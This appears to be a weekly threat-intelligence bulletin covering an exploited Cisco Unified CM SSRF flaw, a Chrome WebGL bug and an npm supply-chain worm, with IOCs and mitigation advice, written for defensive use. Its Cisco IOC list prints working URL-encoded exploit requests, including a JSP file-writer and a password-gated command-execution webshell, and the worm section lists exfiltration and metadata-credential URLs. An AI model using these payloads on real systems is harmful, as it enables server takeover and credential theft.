Weekly Threat Bulletin – July 1st, 2026

Cisco Unified CM Flaw Actively Exploited to Drop Webshells (CVE-2026-20230)

CVE-2026-20230, a server-side request forgery (SSRF) vulnerability in Cisco Unified Communications Manager (Unified CM), is actively being exploited to deploy webshells and achieve remote code execution. Threat intelligence firm Defused observed automated attacks originating from Tor, which leverage the WebDialer SSRF to install a rogue Apache Axis service. This service then writes a first-stage JSP file-writer, subsequently dropping a second-stage command-execution shell under `/platform-services/axis2-web/`. The vulnerability stems from improper input validation for specific HTTP requests, allowing unauthenticated, remote attackers to send specially crafted requests to write files to the underlying operating system, potentially leading to root privilege escalation. Cisco released patches for this flaw on June 3, 2026, acknowledging a proof-of-concept (PoC) exploit, which has since become public. Organizations unable to upgrade are advised to mitigate the risk by disabling the vulnerable WebDialer service.

Severity: Critical

Threat Details and IOCs

Malware:	BlackBasta, Payouts King
CVEs:	CVE-2024-20253, CVE-2026-20045, CVE-2026-20230
Technologies:	Cisco Expressway Series, Cisco Finesse, Cisco Packaged Contact Center Enterprise, Cisco Unified Communications Manager, Cisco Unified Communications Manager IM and Presence Service, Cisco Unified Communications Manager Session Management Edition, Cisco Unified Contact Center Enterprise, Cisco Unified Contact Center Express, Cisco Unity Connection, Cisco Virtualized Voice Browser, Cisco Voice Operating System, Cisco Webex, Linux
Threat Actors:	BlackBasta, JINX-0164, Payoutsking, TA4922
Attacker URLs:	hxxps[://]github[.]com/HORKimhab/CVE-2026-20230, /platform-services/axis2-web/aaa.jsp?f=../../../../../../../common/log/taos-log-a/tomcat/webapps/platform-services/axis2-web/c.jsp&t=%3c%25%20if(%22123%22.equals(request.getParameter(%22pwd%22)))%7b%20java.io.InputStream%20in%20%3d%20Runtime.getRuntime().exec(request.getParameter(%22i%22)).getInputStream()%3b%20int%20a%20%3d%20-1%3b%20byte%5b%5d%20b%20%3d%20new%20byte%5b2048%5d%3b%20out.print(%22%3cpre%3e%22)%3b%20while((a%3din.read(b))!%3d-1)%7b%20out.println(new%20String(b))%3b%20%7d%20out.print(%22%3c%2fpre%3e%22)%3b%20%7d%20%25%3e, /platform-services/axis2-web/c.jsp?pwd=123&i=id, /webdialer/services/randomR11?method=nextInt&arg0=%3C%21%5BCDATA%5B%0A%3C%25if%28request.getParameter%28%22f%22%29%21%3Dnull%29%28new+java.io.FileOutputStream%28application.getRealPath%28%22%2F%22%29%2Brequest.getParameter%28%22f%22%29%29%29.write%28request.getParameter%28%22t%22%29.getBytes%28%29%29%3B%25%3E+%0A%5D%5D%3E, /webdialer/Version.jws?wsdl
Victim Industries:	Consumer Packaged Goods, Education, Financial Services, Government, Healthcare, Higher Education & Research, Information Technology, Insurance, Legal Services, Manufacturing, Media & Telecommunications, Oil & Gas, Professional Services, Retail, Software, Telecommunications
Victim Countries:	Canada, Switzerland, United Kingdom, United States

Mitigation Advice

Identify all Cisco Unified Communications Manager (Unified CM) and Unified CM Session Management Edition instances and immediately upgrade them to a patched version as specified in the Cisco security advisory for CVE-2026-20230.
If patching of Cisco Unified CM cannot be performed immediately, disable the WebDialer service on all vulnerable instances to remove the attack surface for CVE-2026-20230.
On all Cisco Unified CM servers, immediately scan the filesystem for new or unexpected files in the `/platform-services/axis2-web/` directory, as this is a known indicator of compromise for CVE-2026-20230.
Update firewall or web application firewall (WAF) rules to block or alert on all inbound traffic from known Tor exit nodes to your public-facing Cisco Unified CM instances.

Compliance Best Practices

Establish a formal vulnerability management program that includes a complete asset inventory, regular scanning, and defined service-level agreements (SLAs) for patching critical systems like Cisco Unified CM.
Implement network segmentation to isolate critical voice and communication infrastructure, such as Cisco Unified CM, from general user and server networks, allowing only necessary and strictly-controlled traffic to and from these systems.
Implement a system hardening policy based on the principle of least functionality, ensuring all non-essential services, such as the WebDialer service on Cisco Unified CM, are disabled by default during server deployment and audited regularly.
Deploy a File Integrity Monitoring (FIM) solution on critical servers, including Cisco Unified CM, and configure it to alert on any file changes in application and system directories.
Implement a policy of default-deny egress traffic filtering for critical servers, including Cisco Unified CM, allowing only outbound connections to known, approved destinations over expected ports and protocols.

Sources

https://buaq.net/go-424971.html

https://buaq.net/go-425217.html

https://cyberpress.org/cisa-cisco-unified-communications-manager-ssrf/

https://cyberpress.org/cisco-communications-manager-ssrf/

https://cyberpress.org/cisco-unified-communications-manager-flaw/

https://cyberveille.esante.gouv.fr/alertes/cisco-cve-2026-20230-2026-06-04

https://darkwebinformer.com/ssrf-to-root-unauthenticated-file-write-flaw-in-cisco-unified-cm-cve-2026-20230/

https://exploit-intel.com/vuln/CVE-2026-20230

https://gbhackers.com/cisa-adds-actively-exploited-cisco-unified-cm-flaws-to-kev-catalog/

https://gbhackers.com/cisco-unified-communications-manager-flaw-2/

https://gbhackers.com/poc-exploit-released-for-cisco/

https://horizon3.ai/attack-research/vulnerabilities/cve-2026-20230/

https://latesthackingnews.com/2026/06/25/cisco-unified-cm-ssrf-exploited/

https://meterpreter.org/cve-2026-20230-vulnerability/

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-ssrf-cXPnHcW?vs_f=Cisco%20Security%20Advisory%26vs_cat=Security%20Intelligence%26vs_type=RSS%26vs_p=Cisco%20Unified%20Communications%20Manager%20Server-Side%20Request%20Forgery%20Vulnerability%26vs_k=1

https://securityonline.info/cisco-unified-cm-vulnerability-public-poc/

https://socradar.io/blog/cve-2026-20230-cisco-unified-cm-webdialer-ssrf/

https://sploitus.com/exploit?id=5581E532-E0A6-5210-9EB3-48C5BA4A5411

https://thehackernews.com/2026/06/cisco-patches-cve-2026-20230-in-unified.html

https://thehackernews.com/2026/06/cisco-unified-cm-flaw-exploited-after.html

https://www.bleepingcomputer.com/news/security/cisco-unified-cm-sme-flaw-cve-2026-20230-now-exploited-in-attacks/

https://www.bleepingcomputer.com/news/security/cisco-warns-of-critical-unified-cm-flaw-with-poc-exploit-code/

https://www.helpnetsecurity.com/2026/06/24/cisco-unified-cm-flaw-exploited-to-drop-webshells-cve-2026-20230/

https://www.hendryadrian.com/cisco-warns-of-available-poc-for-critical-unified-cm-vulnerability/

https://www.securitylab.ru/news/574110.php

https://www.securityweek.com/hackers-exploiting-cisco-unified-cm-vulnerability/

https://www.thehackerwire.com/cisco-unified-cm-unauthenticated-ssrf-to-root-privilege-escalation/

CVE-2026-13028: Critical Use-After-Free in Google Chrome WebGL Allows RCE

A critical use-after-free vulnerability, identified as CVE-2026-13028 with a CVSS v3.1 score of 9.6, exists within the WebGL component of Google Chrome. This flaw allows for remote arbitrary code execution and, specifically on Android, a sandbox escape, due to improper memory object lifecycle management. An attacker can exploit this by enticing a user to visit a specially crafted HTML page, requiring only simple user interaction and no prior authentication or elevated privileges. The attack complexity is low, and the vulnerability can lead to privileged access. Affected Google Chrome versions include those prior to 149.0.7827.197 on Windows and macOS, prior to 149.0.7827.196 on Linux, and prior to 149.0.7827.197 on Android. A patch is available, and users are advised to update to Google Chrome version 149.0.7827.197 or higher for Windows, macOS, and Android, and version 149.0.7827.196 or higher for Linux. While a patch exists, no workaround is available, and there is currently no public proof of concept or active exploitation.

Severity: Critical

Threat Details and IOCs

Malware:	AryStinger, Cobalt Strike, Cobalt Strike Beacon, macOS.Gaslight, SharkLoader
CVEs:	CVE-2026-13021, CVE-2026-13022, CVE-2026-13023, CVE-2026-13024, CVE-2026-13025, CVE-2026-13026, CVE-2026-13027, CVE-2026-13028, CVE-2026-13029, CVE-2026-13030, CVE-2026-13031, CVE-2026-13032, CVE-2026-13033, CVE-2026-13034, CVE-2026-13035, CVE-2026-13036, CVE-2026-13037, CVE-2026-13038, CVE-2026-2441
Technologies:	Apple macOS, Google Android, Google Chrome, Linux, Microsoft Windows
Victim Industries:	Healthcare
Victim Countries:	France, India, United States

Mitigation Advice

Update all Google Chrome installations on Windows and macOS endpoints to version 149.0.7827.197 or later.
Update all Google Chrome installations on Linux endpoints to version 149.0.7827.196 or later.
Enforce an update for the Google Chrome application on all company-managed Android devices to version 149.0.7827.197 or later using your Mobile Device Management (MDM) solution.
Run a scan with your asset inventory or vulnerability management tool to verify that all Google Chrome instances on Windows, macOS, Linux, and Android are at or above the patched versions listed in the advisory.

Compliance Best Practices

Implement and configure an automated patch management policy for third-party applications, especially web browsers, to ensure critical security updates are deployed across all endpoints within 48-72 hours of release.
Deploy a DNS filtering or secure web gateway solution to block access to known malicious, uncategorized, and newly registered domains to reduce the risk of users accessing malicious web content.
Deploy and tune an Endpoint Detection and Response (EDR) solution to monitor for and alert on anomalous behaviors originating from browser processes, such as spawning a command shell, unexpected network connections, or file modification.
Develop and maintain a continuous security awareness training program that educates users on the dangers of clicking unsolicited links and how to report suspicious websites and emails.

Sources

https://cyberpress.org/chrome-149-update-patches/

https://cyberveille.esante.gouv.fr/alertes/google-cve-2026-13028-2026-06-25

https://gbhackers.com/google-chrome-update-patches-18-security-flaws/

https://securityonline.info/chrome-149-security-update/

https://www.malwarebytes.com/blog/news/2026/06/update-chrome-to-patch-critical-browser-security-flaws

https://www.securityweek.com/chrome-149-update-resolves-18-severe-vulnerabilities/

Mini Shai-Hulud Worm Poisons LeoPlatform npm Packages to Steal Developer and CI/CD Secrets

A recent supply-chain attack, attributed to the Mini Shai-Hulud, Miasma, and Hades malware families, is actively poisoning npm packages within the LeoPlatform and RStreams ecosystems, extending its reach to source-repository compromises. This intrusion employs registry poisoning, install-time execution via the "Phantom Gyp" pattern using `binding.gyp` for arbitrary code execution, Bun-staged JavaScript loaders to bypass Node security hooks, and GitHub Actions abuse to steal runner-scoped secrets and inject malicious workflows. The malware targets a broad array of developer and CI/CD secrets, including `.env` files, npm and PyPI tokens, GitHub tokens, cloud provider credentials (AWS, Azure, GCP), Docker and Kubernetes configurations, SSH keys, Vault data, CI secrets, IDE and AI-agent configurations, Slack and Twilio tokens, and shell histories, while also probing for EDR and endpoint tooling and using locale guards for evasion. Collected secrets are encrypted and exfiltrated via GitHub API behaviors, utilizing a "dead-drop" approach where commit messages or repository content serve as retrieval channels. The campaign also weaponizes developer workflows and IDE triggers, such as dropping payloads in `.claude` folders and invoking them via VS Code folder-open tasks, to achieve delayed, developer-initiated execution. Mitigation requires treating any environment with affected versions as compromised, preserving forensics, identifying all developer machines and CI runners, removing and rebuilding from known-good lockfiles, rotating all exposed credentials from a clean host, and auditing repositories for injected workflows, AI assistant hooks, specific payload files like `.github/setup.js` or ``_index.js`,` orphan branches, and unexpected Bun usage. Specific indicators of compromise, including SHA-256 hashes for malicious `binding.gyp`, `index.js`, `package.json` files, and npm tarballs, have been identified.

Severity: Critical

Threat Details and IOCs

Malware:	CanisterWorm, dbmux, GlassWorm, hackerbot-claw, Hades, IronWorm, JS.Worm.ShaiHulud, kitty-monitor, Megalodon, Miasma, Miasma: The Spreading Blight, Miasma worm, Mini Shai-Hulud, Phoenix Locker, Python.Loader.Shai-Hulud, s1ngularity, SANDWORM_MODE, sha1-hulud, Sha1-Hulud, SHA1-Hulud, Sha1-Hulud: The Second Coming, Shai-Hulud, Shai-Hulud 2.0, Shai-Hulud 3.0, ShaiWorm, Shaulud, TeamPCP cloud stealer, TeamPCPCloudStealer, telemetry.js, The Spreading Blight, Vect, Vect 2.0, WastedLocker
CVEs:	CVE-2019-5736, CVE-2020-10148, CVE-2022-0492, CVE-2023-29059, CVE-2024-21626, CVE-2024-3094, CVE-2025-10894, CVE-2025-30066, CVE-2025-55182, CVE-2025-59144, CVE-2025-59532, CVE-2025-59536, CVE-2025-6514, CVE-2026-21852, CVE-2026-22708, CVE-2026-33634, CVE-2026-42271, CVE-2026-45321, CVE-2026-45758, CVE-2026-46412, CVE-2026-48027
Technologies:	1Password, 3CX DesktopApp, Aider-AI Aider, Amazon Web Services, Amazon Web Services (AWS), Anthropic Claude, Anysphere Cursor, Apple macOS, Aqua Security Trivy, Arweave, Auto-GPT, Bun, Bundler, Checkmarx, Checkmarx KICS, CircleCI, CrewAI, CrowdStrike, Cursor, Dify, Docker, Git, GitHub, GitHub Actions, GitHub Copilot, GNU Privacy Guard, Google Cloud Platform, Google Gemini, Google Gemini CLI, gopass, HashiCorp Vault, JFrog, Kubernetes, Leo/RStreams, Linux, LiteLLM, Microsoft Azure AI, Microsoft Azure Functions, Microsoft Durable Task, Microsoft Entra ID, Microsoft GraphRAG, Microsoft .NET Framework, Microsoft Visual Studio, Microsoft Windows, Mistral AI, MongoDB Server, Node.js, npm, Nrwl Nx, OpenAI, OpenAI Codex, OpenCode, OpenSSH, Oracle MySQL, pnpm, PostgreSQL, PyPI, Python, Python Package Index, Python PyPI, Red Hat, Red Hat Cloud Services, Replit, RubyGems, SentinelOne, Sigstore, SolarWinds, Sonatype Nexus Repository, SSH, Stanford DSPy, Starlette, StepSecurity, StepSecurity Harden-Runner, TanStack, The Linux Foundation Sigstore, UiPath, Vapi.ai, Vapi SDK, VMware Carbon Black, WeaveDB, Yarn, Zoom
Threat Actors:	APT38, Bluenoroff, CageyChameleon, CipherForce, CryptoCore, DangerousPassword, DeadCatx3, DragonForce, Elitexp, EvilCorp, GlassWorm, GoldWinter, HasanBroker, IndrikSpider, Lapsus, Lazarus, LazarusGroup, LeeryTurtle, MASAN, Megalodon, Miasma, NICKELGLADSTONE, PCPcat, PersyPCP, PG_MEM, ReplicatingMarauder, ResoluteXBF, Sandworm, SapphireSleet, SHADOW-WATER-058, ShellForce, ShinyHunters, StardustChollima, Ta444, TeamPCP, TGR-CRI-1135, TGRCRI1135, TraderTraitor, UNC1069, UNC4899, UNC6780
Attacker Countries:	North Korea, Russia, South Africa
Attacker IPs:	103[.]75[.]11[.]59, 142[.]11[.]206[.]73, 154[.]47[.]29[.]12, 160[.]119[.]64[.]3, 170[.]62[.]100[.]245, 209[.]159[.]147[.]239, 83[.]142[.]209[.]0
Attacker Emails:	claude@users[.]noreply[.]github[.]com, github-actions@github[.]com
Attacker Domains:	aab[.]sportsontheweb[.]net, agent[.]stepsecurity[.]io, api[.]anthropic[.]com, api[.]github[.]com, api[.]stepsecurity[.]io, app[.]stepsecurity[.]io, check[.]git-service[.]com, checkmarx[.]zone, github[.]com, git-service[.]com, git-tanstack[.]com, graph[.]microsoft[.]com, help[.]sonatype[.]com, login[.]microsoftonline[.]com, models[.]litellm[.]cloud, nsa[.]cat, oob[.]moika[.]tech, registry[.]npmjs[.]org, scan[.]aquasecurtiy[.]org, sfrclak[.]com, tdtqy-oyaaa-aaaae-af2dq-cai[.]raw[.]icp0[.]io, telemetry[.]api-monitor[.]com, temp[.]sh, t[.]m-kosche[.]com, webhook[.]site
Attacker URLs:	api[.]anthropic[.]com[:]443/v1/api, api[.]anthropic[.]com/v1/api, check[.]git-service[.]com/rope.pyz, github[.]com/liuende501, github[.]com/oven-sh/bun/releases, github[.]com/oven-sh/bun/releases/download/bun-v1.3.13, github[.]com/oven-sh/bun/releases/download/bun-v1.3.13/bun-*.zip, hxxp[://]169[.]254[.]169[.]254/latest/api/token, hxxp[://]169[.]254[.]169[.]254/metadata/identity/oauth2/token, hxxps[://]api[.]anthropic[.]com[:]443/v1/api, hxxps[://]api[.]github[.]com/graphql, hxxps[://]api[.]github[.]com/repos/liuende501/nemean-hydra-34343/contents/results/results-1780551069887-0.json, hxxps[://]api[.]github[.]com/search/commits?q=IfYouInvalidateThisTokenItWillNukeTheComputerOfTheOwner, hxxps[://]api[.]github[.]com/search/commits?q=thebeautifulmarchoftime, hxxps[://]api[.]github[.]com/user, hxxps[://]api[.]github[.]com/user/repos, hxxps[://]github[.]com/liuende501, hxxps[://]github[.]com/oven-sh/bun/releases/download/bun-v1.3.13/, hxxps[://]github[.]com/oven-sh/bun/releases/download/bun-v1.3.13/bun-linux-x64-baseline.zip, hxxps[://]graph[.]microsoft[.]com/v1.0/me, hxxps[://]login[.]microsoftonline[.]com/, hxxps[://]registry[.]npmjs[.]org/-/npm/v1/oidc/token/exchange/package/, hxxps[://]registry[.]npmjs[.]org/-/v1/search?text=maintainer:{username}, hxxps[://]registry[.]npmjs[.]org/-/whoami, hxxps[://]temp[.]sh, hxxp[:]//169.254.169.254/latest/meta-data/iam/security-credentials/, hxxps[:]//api.anthropic.com/v1/api, hxxps[:]//api.github.com, hxxps[:]//api.github.com/search/commits?q=firedalazer, hxxps[:]//fulcio.sigstore.dev, hxxps[:]//github.com/oven-sh/bun/releases/download/bun-v1.3.13/, hxxps[:]//github.com/oven-sh/bun/releases/download/bun-v1.3.13/bun-{os}-{arch}.zip, hxxps[:]//github.com/oven-sh/bun/releases/download/bun-v1.3.14/, hxxps[:]//login.microsoftonline.com/, hxxps[:]//upload.pypi.org/legacy/, hxxps[:]//webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7, registry[.]npmjs[.]org/-/npm/v1/tokens, registry[.]npmjs[.]org/-/whoami, tor[:]//api/agent
Attacker Hashes:	026588d39b7c650b5c0dfbba6c6fcc0e7ec8e3b72ba8639012e7f71c708f2c3b, 031ba872d5a84bfb18115f432811e4b45180346a1bae653f7fd85f918e7bb3a3, 080190bffcaafffacca1f0181fc9024aaaa21500ffdc9926fa5b689ba959965d, 09b2301d1589416e0d5fb7a602427a9850dee6713ffa741c0efcfeb1eb4c8952, 0c5077e51419868618aeaa5fe8019c62421857d6, 0c9c67ec40d5f23efa1ec3470d0ac88b4993ccc0e92be913fc29a337dfc4f060, 0d1e742c4f94d592d6b824cf7cb9dfebd8c2a323345080a6524d0352d1cd479c, 0dc06ecdaa63fe24859cfd955053c23245c536e4733480239d14bebf12688e35, 0fe6a098fe698e586188e0f2e851ef43f1a35958, 10c619e75181d07ddcccb5c1f62766c85fef08df, 1259284706ec9ffbcccbede1e8055c1a4fa5fd69885dfb982ccd06df2fb83d0a, 15b415ae41df72acf1f7e9e67569531d41dee62d089d34b4c0fab0c7fe5cc14f, 17c4312b50d69a6f61515edcf71cfaa8271fe2538b942128cfb639d021d042a7, 1a30a9abe20bab121aaa75ed040565af14e6cdfb745609ee0e7b94a2d814fb9c, 1a3b9ed0b377f56f49b9a703612cf45e86ab7d100587e1e7a476d809fe337a8c, 21b6409a7b84446310daca5409ad6112ac60a1e4bef97736e53fff5f63bfdef4, 25e121e3b7d300c0d0075b33e5eca39a3e6a659fb9cfee52b70ef71686628f1b, 288f26c2eadcb1a7923fe376d16f5404216cce15d9fc162a4a78574dc7df399a, 2a446171b4b981d98b5af6c5606bd63b1570040334210b6ab0a10901b2606fe5, 32d1bc728d8e504952083a6adc488c309a401c7df4dc8f47b382ce32e4aebe21, 396cac9e457ec54ff6d3f6311cb5cc1da8054d019ce3ffa1de5741506c7a4ea4, 3da2ca129c9920d9acd2e3477aee8f46b5a5f0e9537ad6e7b6ab1df1007adad1, 3f3f42d072bd36860ab7bd7fb5e10ac0d22c741c13c89505ccd6ec0ea572eea7, 3f8e522595f32277a0013c7ab0df3ecf336460b56e6b4be9130907f419db3b6d, 42e165602967c8e1a6fae0113a5179adbe33e18192244fe34b872db09c85e0e6, 46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09, 4a0aa78757958683155a7b9289427fb829abcad1bf5ee6399eb73e8409b0bc11, 4b2399646573bb737c4969563303d8ee2e9ddbd1b271f1ca9e35ea78062538db, 545a1838c66e1771f58d84a17b3e1841e5eeab91a73f4ccc59c9492450a6d9c0, 57ba86f6f0caaa580c1dccdf4ed7873d1470e5ea2f8e9ca7a989dc04899f13c0, 5926b86b642e00672252953eb30d8f75cfb7797fe3118bd6fa2cfbee92905d61, 5c6cb758a3447bc7e0de34406919a933f9351e90ef04ec43f3bbb401e7004e1b, 5d7c93caf50a447a8d48cafe2e5cff6b47618b13, 5dabf08e2655c012e478074a2cea2b0d34e286c27265a26f3846fc45e5584501, 608d01124cd6b5b8c55888e984b4c4d9b06fa686, 62ee164b9b306250c1172583f138c9614139264f889fa99614903c12755468d0, 633ad8849a59e2bfb7a0fe589e816a07, 6506d31707a39949f89534bf9705bcf889f1ecae3dbc6f4ff88d67a8be3d01b2, 675294612f455fe6a9acb195f0cbe3687d8e2e34, 6cb3fc3650355973b8a1ed86619a3f412fb0700f29c1c3a736cada4c2c76a9f7, 6d332f814f15f19758d65026bbfd0a8c49671b319ec77b8fa1b27fc48afff7d9, 7557c4e782a0622159476d1ea10d5236, 7569d69cf3684a792ce63d19b6e0d9d192597963, 7b19ffc2f2bfff75989255e5e807d0f62513153de287eba9cc17003c1dcae8a8, 7cbace2a186cab2c652305b6e33c8eeb10d4a0ec3a0c8b795de012094fa0d845, 82d83274680df928fdda296a348e01802f595e412308c399565c320df444052a, 85b1ed56530bb64d925af4ca50faacd89efb1b63d615238a34adbea9f00e4754, 88896d478986d453f5da79b311de39d9b4b1bea95c21af1d8ef181b0f4e52fe9, 88d098c8d96e9ae17550e9798c3b62c420464b8c, 89f97557200bd26cc8941c9abaadac2d798a89562401016fbb2c757e3092dfdc, 8bf051251ec3b973e39a313547e53421a2f8d2f6, 8d2a09b3727b50f3d035b58bd35b90b504d24dda73a8a24e926a010a58ba5f74, 927387d0cfac1118df4b383decc2ea6ba49c9d2f98b47098bcbcba1efc026e1f, 94e8488fd033728eee6666550d5a94b0cc1f7b231d4d85d0affecb0615116722, 9566275be80af10b8c6be1d47bfcfdbe5590f472b1a9abd85bad24e0a9a7a891, 9b99482b75ee89f0d916f2743deeff381ea727e69c71491822477e67891841ad, 9c0425aa6e6d7792ac38d24f3e7245f42fcaa553ddfeb6bd97677017f10c3b75, 9e6c5af01438b52c9a411686c1f1b8ff, a150985aac1847e4a2e198f7ecccbbbc9443840699efd5a7654a006d61e1288e, a3894003ad1d293ba96d77881ccd2071446dc3f65f434669b49b3da92421901a, a8f0c75a77698759413dbadcb99b62709816ed42, a934a5bcf692b9d01e8129bf264be23809dfee464df471d75a9f3fa1bcede343, aab0659e13fa2a8e482139b97ae523aacec91a42b5f125a7b0952bf57c3ac864, aaf00d06baa3c679b82452c50014e9824b8874e9ca2d150f19095f8de19ba90f, ab9903d9edc720d1e11ea7d3d3e7a1c456f44ff7, ac2a2208e1726e008be6c73dc0872d9bba163319259dff1b62055ac933ca46b6, b19c2fd48535c8c40aeb3e627ce92775f33ef9292611767bb1236c238e6f90cc, b390d9f708760b799ee5482e8050ce093219140627fcaec6df8812ac9abb9a9b, b3e217f4354e8a4383038b99b0bcaeaff191a79df58e7a1f2355a79aac2faf13, b74caeaa75e077c99f7d44f46daaf9796a3be43ecf24f2a1fd381844669da777, b86c5ae9e95bd841a595440faa3eb6317441e746f241ae8fd641ab59ed1d1966, bbbca2ddaa5d8feaa63e36b76fdaad77386f024f, bd8035203536735490e4bd5cdcede581a9d3a3f7a5df7725859844d8dcc8eb49, bdcdae644bdf6285d01a986e1b8feb7ec4060e2c7d5f5e2609c16718922b7944, c178cafa2b3bcbefbbc283b5ab8fc6143e46650631f72451a44327f146a609c3, c2a60face766f69f82c972375f35f8ebaa45d6c464176974e631d9a78d6bea0a, c539766062555d47716f8432e73adbe3a0c0c954a0b6c4005017a668975e275c, c5443b06aeb12dbf16046f9a8c9446d30e22655110e1e06919406d6f01a14ac5, c611e49ea46c91013448942c26049741b434cb5dac55fff7c376ca6a4f28580e, c95506221d18936328fbc7ddcd21e3dd, c96f37e1b9cdc9683a300909492ed9f770b620d0037e5b80e23753cba7ca4077, cbb9bc5a8496243e02f3cc080efbe3e4a1430ba0671f2e43a202bf45b05479cd, ceff7c51d70832c3ec8dd2744b606a23b3c924ef664ae23439b9b742ea154108, cffc487ee978f7bc06e3856b286940940658884847d38b619a137b8272a75980, d1999fd543085918dd542322c6455abde3c57a93b8f7ce871b8809c8bb744af7, d543bb3cdf1569c2b3d38c8a4081ed746cfe78bf3236c2302704d79ab7fa9558, d590bd375d95e4ac072b7ebc1fc4489bcaf5f20a939e92486267aa398bcf1e5d, d5a97614d5319ce9c8e01fa0b4eb06fb5b9e54fa13b23d718174a1546444123b, d8d170af3de17bb9b217c52aaaffdf9395f35ef015a57ef676e406c121e5e223, da39146ef451d1b174a24d00b1e2a45cd38d54e849737f8f35333dcb22175707, dc48b09b2a5954f7ff79ab8a2fd80202bd3b59c08c7cdbc6025aa923cb4c0efe, dc67467a39b70d1cd4c1f7f7a459b35058163592f4a9e8fb4dffcbba98ef210c, de0fac2e4500dabe0009e67214ff5f5447ce83dd, df1732f5bfec12e066be44dee02ec8a243e4868d38672c1b1d065359dd735a14, df9ea0c71574e11c93141ad2f018a63a5375cd6d69ca2f744732ad7814170657, e1342a80d4b5e83d2c7c22e1e0aaa95f2d88e3dbf0d853a4994b180c93a4b17d, e3dbe63aded45278f49c4746ab938ed9472b36def79b43e2dd2d7eff014481d1, e5f73c888f1250a8895680801975cf177e8c690defd4a999e56f6c08ff64deb8, edd86c0efd776a6bd934fc7b0d4d6da2b256e147cfa83bb0c2814e81d849c427, ef641e956f91d501b748085996303c96a64d67f63bfeef0dda175e5aa19cca90, f0641e053e81f0d01fa46db35a83e0a34494886503086866d956d14e81fd3e1c, f099c5d9ec417d4445a0328ac0ada9cde79fc37410914103ae9c609cbc0ee068, f1ffdbf5e639899f26a6ebab2eec408d, f3c5c21274045ae02fef11e931de6dcf8462a067, f565988f281bf77bcad26ea7f543617e53da4b62f5df63d4f7a89bae1729cf81, f7c47be306351ffacd46584d2067f7be676dbfe17cd89ab4880632decfe18f3d, f88258e21592084a2f93a572ade8f9b91c0cd0e242f5cf6121ed7bad0f7bdd1f, f961d6897c0ec586cde633e100865b5b1d435cc7c301dbf0f41298ca5b42e17a, fb174de58e6825fed16de26d74ffbcacd74d371951e3064db51cfd700146d86f, fb5c97557230a27460fdab01fafcfabeaa49590bafd5b6ef30501aa9e0a51142, fd64413119575fa119eaa9f94d32208c7d916796
Victim Industries:	Academia, Artificial Intelligence, Biotechnology, Blockchain, Cloud Infrastructure, Cryptocurrency, Education, Financial, Financials, Financial Services, Government, Healthcare, Information Security, Information Technology, Life Sciences, Manufacturing, Pharmaceuticals, Professional Services, Public Sector, Scientific Research, Software, Technology Hardware, Telecommunications
Victim Countries:	Austria, Belgium, Bulgaria, Canada, China, Croatia, Cyprus, Czech Republic, Denmark, Estonia, European Union, Finland, France, Germany, Greece, Hungary, Iran, Ireland, Israel, Italy, Latvia, Lithuania, Luxembourg, Malta, Netherlands, Poland, Portugal, Romania, Slovakia, Slovenia, Spain, Sweden, United Kingdom, United States

Mitigation Advice

Scan all developer workstations and CI/CD runners for files matching the SHA-256 hashes provided in the article, including '32d1bc728d8e504952083a6adc488c309a401c7df4dc8f47b382ce32e4aebe21' for 'binding.gyp'.
Immediately initiate a rotation of all developer and CI/CD secrets, including credentials for GitHub, npm, AWS, Azure, GCP, SSH keys, and any other secrets stored in .env files or CI/CD environments.
Audit all project `package-lock.json`, `yarn.lock`, and other lockfiles to identify any dependencies on the malicious npm packages listed in the article, such as those in the LeoPlatform and RStreams ecosystems.
Audit all source code repositories for suspicious artifacts, including unexpected branches named 'snapshot-*', malicious GitHub Actions workflows (especially those named 'Run Copilot'), and unexpected files like `_index.js` or `.github/setup.js`.
Scan developer workstations for malicious IDE and AI-assistant hooks, specifically looking for executable scripts within `.claude`, `.cursor`, `.gemini`, or `.vscode` directories inside project folders.

Compliance Best Practices

Implement a supply chain security tool (e.g., Socket, Snyk) to automatically scan all third-party dependencies for malicious indicators, such as unexpected install scripts in `binding.gyp` files, before they are added to projects.
Configure process execution monitoring on CI/CD runners and developer endpoints to create alerts for anomalous behavior, such as a package manager process (e.g., npm, yarn) spawning an unexpected runtime (e.g., bun) or network utility (e.g., curl).
Establish and enforce a security policy for CI/CD pipelines that prohibits the use of high-risk GitHub Actions triggers like `pull_request_target` with code checkouts from pull requests, and mandates the principle of least privilege for all workflow tokens.
Tune Endpoint Detection and Response (EDR) policies to specifically detect and alert on suspicious process chains originating from package managers and build tools, such as `npm` or `node-gyp` executing shell commands or downloading files.
Establish a corporate policy that restricts the installation and execution of non-standard JavaScript runtimes, such as Bun, on developer workstations and CI/CD runners unless there is a documented business justification.
Develop and implement a recurring security awareness training program for developers focused on supply chain attack vectors, including how to vet third-party packages and identify suspicious repository files and configurations.

Sources

https://about.gitlab.com/blog/shai-hulud-copycat-campaign-targets-python-developers/

https://arstechnica.com/security/2026/06/dozens-of-red-hat-packages-backdoored-through-its-offical-npm-channel/

https://arstechnica.com/security/2026/06/for-the-2nd-time-in-weeks-microsoft-packages-laced-with-credential-stealer/

https://blog.polyswarm.io/miasma-expands-software-supply-chain-attacks-through-compromised-ci/cd-infrastructure

https://buaq.net/go-420430.html

https://buaq.net/go-422065.html

https://buaq.net/go-422396.html

https://buaq.net/go-423642.html

https://buaq.net/go-424746.html

https://cyberpress.org/binding-gyp-targets-npm-maintainers/

https://cyberpress.org/dbmux-malware-targets-developers/

https://cyberpress.org/ironworm-targets-developer-secrets/

https://cyberpress.org/microsoft-packages-spread-stealer/

https://cyberpress.org/red-hat-cloud-npm-packages-compromised/

https://cyberpress.org/red-hat-confirms-supply-chain-breach/

https://cyberpress.org/shai-hulud-abuses-npm-payloads/

https://cyberpress.org/shai-hulud-attack-compromises-23-pypi-packages/

https://cyberscoop.com/teampcp-breaks-open-source-software-trust-model/

https://gbhackers.com/20-leo-rstreams-packages/

https://gbhackers.com/73-microsoft-packages-weaponized/

https://gbhackers.com/attackers-exploit-docker-kubernetes/

https://gbhackers.com/dozens-of-npm-packages-via-binding-gyp/

https://gbhackers.com/ironworm-npm-attack/

https://gbhackers.com/malicious-npm-package-dbmux/

https://gbhackers.com/shai-hulud-malware-campaign-abuses-23-pypi-packages/

https://gbhackers.com/shai-hulud-worm-poisons-leoplatform/

https://hackread.com/miasma-malware-red-hat-packages-github-account/

https://isc.sans.edu/diary/rss/33060

